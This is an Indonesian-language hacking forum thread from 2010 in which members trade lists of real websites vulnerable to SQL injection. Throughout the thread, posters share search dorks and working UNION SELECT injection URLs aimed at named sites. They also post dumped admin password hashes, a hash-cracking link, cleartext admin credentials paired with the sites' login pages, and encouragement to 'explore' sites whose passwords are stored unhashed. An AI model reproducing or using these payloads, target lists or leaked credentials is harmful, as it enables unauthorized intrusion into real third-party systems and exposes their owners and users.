Kumpulan website vulnerable Global - Share disini

Post by **^XmoenseN^** » Mon Aug 02, 2010 9:50 am

:kaca: izin experiment kang poni..... :kaca:

d4nker666 · Post by **d4nker666** » Tue Aug 03, 2010 9:22 pm

Dork: inurl:"/wp-content/plugins/photoracer/viewimg.php?id="

http://www.badged.gr/wp-content/plugins ... wp_users--
admin:$P$BevtfQubEwX8906CJsplpujfENh0V/0

http://powersimages.com/wp-content/plug ... wp_users--
admin:$P$BpMBM15fSoIWGZ.Jcnep30jco.mMLf.

http://rossodisera.pdferrara.it/wp-cont ... wp_users--
admin:$P$B9RCMVVF7.KD5J8E3goYQcvOd8dv1g1

http://www.chicasrider.cl/wp-content/pl ... wp_users--
edbong:$P$BlRW812yP8RO2zCiZSnzkV8TZtC0ZR0

http://www.soycanarion.es/wp-content/pl ... wp_users--
admin:$P$BVUoU5ekyFj38DHD0vk8MXYq1.D8KA0

http://nudephotocontest.com/wp-content/ ... wp_users--
admin:$P$BHgrGZTWkzz0IAteOyN/jjz67.IR0l.

hash : http://revtan.site40.net/cracker/index.php

abit doang · Post by **abit doang** » Wed Aug 04, 2010 11:22 pm

dork -> inurl:"cat.php?" site:.au

Code: Select all

http://www.markaline.com.au/cat.php?selectcat=4
http://www.carak.com.au/cat.php?category_id=-14
http://www.kidsbits.com.au/cat.php?category_id=-4
http://www.itac2.com.au/cat.php?category_id=-1
http://www.chrisbrazel.com.au/site/cat.php?cat='11
www.greenfrogpromo.com.au/catalogue/cat.php?cid=7
http://www.healthyuonline.com.au/cat.php?category_id='12

Code: Select all

http://www.jracing.com.au/cat.php?cid=22
n=1
version()    5.0.90
database() [jracing_catalogue ]

Code: Select all

www.pauljones.id.au/photos/cat.php?new=3
N=27
user() peejay_peejay@localhost
version() 5.0.90-community
DBnya banyak -> database() [ peejay_website ] [ peejay_blog ] [ peejay_joomla ] [ peejay_website ]

dump DB -> peejay_blog
[ wp_commentmeta ]
[ wp_comments ]
[ wp_links ]
[ wp_options ]
[ wp_postmeta ]
[ wp_posts ]
[ wp_term_relationships ]
[ wp_term_taxonomy ]
[ wp_terms ]
[ wp_usermeta ]
[ wp_users ] -> dump user:pass & email -->> admin : $P$B7BBJ6bZ3Hm.coZQvr0Nym7G.YZSZy.  [email protected]

abit doang · Post by **abit doang** » Thu Aug 05, 2010 1:37 am

SPESIAL -> VERSI 4.X :pusing:

Code: Select all

http://www.djz.edu.my/freeonline/cat.php?cat=-1+UNION+ALL+SELECT+1,VERSION(),3,4,5,6,7,8,9,10--

SPESIAL -> LANGSUNG LOGIN :devil

Code: Select all

http://www.unistream.com.sg/cat.php?catid=1+AND+1=2+UNION+ALL+SELECT+user(),group_concat(table_name)+FROM+information_schema.
tables+where+table_schema=database()--
admin:fahzijelex 
http://www.unistream.com.sg/admin/index.php

Code: Select all

http://www.pennzoil.com.my/gallery-cat.php?categoryid='7
http://www.hillssa.com.au/clientwebs/mms/cat.php?catid='55

dork -> inurl:"cat.php?" site:TERSERAH
:malumalu: :pusing: :licik: :devil :tapa:

simpenan lama nih,..

Code: Select all

http://www.seddonsofbeverley.co.uk/main.php?recordID=103+AND+1=2+UNION+SELECT+0,null,concat(username,0x3a,password)+from+login--

abit doang · Post by **abit doang** » Sat Aug 07, 2010 6:54 pm

smoga gak repost,.

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+all+select%201,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x636d735f61646d696e--

http://www.waballet.com.au/whats_on.php?id=-31+union+all+select+0,1,version(),database(),4,5,6,7,8,9,10,11--

http://www.catlifttruck.com.sg/news/newsitem.php?news_id=-6+union+select+0,1,2--

Post by **poni** » Sat Aug 07, 2010 8:07 pm

Nih dapat target baru dari Bug Sqli yang ditemukan darkzzzz
dork :

Code: Select all

inurl:rubID=

Code: Select all

http://www.planbar.com/coRED/content/jobs/index.php?rubID=1
http://www.glovital.ch/www/content.php?rubid='85
http://www.drhaworth.com/procedures.php?procid='50
http://www.teledom.fr/sint_maarten/lire/index.php?rubid='6

demonbrando · Post by **demonbrando** » Sat Aug 07, 2010 11:56 pm

rubID itu apa yah om poni??maap masih newbie.. :maaf: :maaf:

antebas · Post by **antebas** » Sun Aug 08, 2010 7:43 pm

abit doang wrote:smoga gak repost,.

Code: Select all

http://www.fragrance.org/news_detail.php?id=-36+union+all+select%201,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0x636d735f61646d696e--

http://www.waballet.com.au/whats_on.php?id=-31+union+all+select+0,1,version(),database(),4,5,6,7,8,9,10,11--

http://www.catlifttruck.com.sg/news/newsitem.php?news_id=-6+union+select+0,1,2--

Tak terusin ya om ....... :maaf:

http://www.mitforklift.com.sg/admin/login.php
mcfs:mcfs

http://www.catlifttruck.com.sg/admin/login.php
mcfs:mcfs

abit doang · Post by **abit doang** » Sun Aug 08, 2010 9:44 pm

antebas wrote: Tak terusin ya om ....... :maaf:
http://www.mitforklift.com.sg/admin/login.php
mcfs:mcfs
http://www.catlifttruck.com.sg/admin/login.php
mcfs:mcfs

mantap dah,..
just info buat yg belom tau,..
site *.sg tuh banyak yang nggak di hash passwordnya..
jadi silakan di explore,..

Post by **poni** » Sun Aug 08, 2010 9:55 pm

Hehehe. Abit doang paling rajin post vuln web.mantap.

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini

Re: Kumpulan website vulnerable Global - Share disini